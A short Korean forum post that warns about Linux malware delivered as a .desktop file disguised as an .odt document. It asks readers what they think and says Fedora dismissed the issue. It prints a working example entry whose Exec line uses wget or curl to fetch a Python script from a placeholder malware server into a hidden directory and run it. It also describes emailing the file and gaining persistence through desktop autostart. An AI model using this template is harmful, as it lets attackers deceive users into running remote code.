리눅스에도 악성코드가?
대충 요약하면
1. .desktop파일 형식으로 스크립트 실행 파일을 만든다.
(파일이름에 확장자가 없으면 자동으로 .desktop파일로 인식을 합니다)
예로
[Desktop Entry]
Type=Application
Name=some_text.odt
Exec=bash -c 'URL=http://www.my_malware_server.com/s.py ;
DROP=~/.local/.hidden ;
mkdir -p $DROP;
if [ -e /usr/bin/wget ] ;
then wget $URL -O $DROP/s.py ;
else curl $URL -o $DROP/s.py ; fi;
python $DROP/s.py'
Icon=/usr/share/icons/hicolor/48x48/apps/ooo-writer.png
2. 이메일로 첨부해서 보낸다
3. 유저가 받아서 실행해본다
4. 다운로드된 스크립트는 ~/.kde/Autostart 같은곳에 복사된다
kde나 gnome시작시 자동 실행되게..
갠적인 생각으론 상당히 위협적이라 생각되어지는데
여러분들은 어떻게 생각하나요?
참고로 페도라에선 "well-known and expected behavior" 라며 무시했다는군요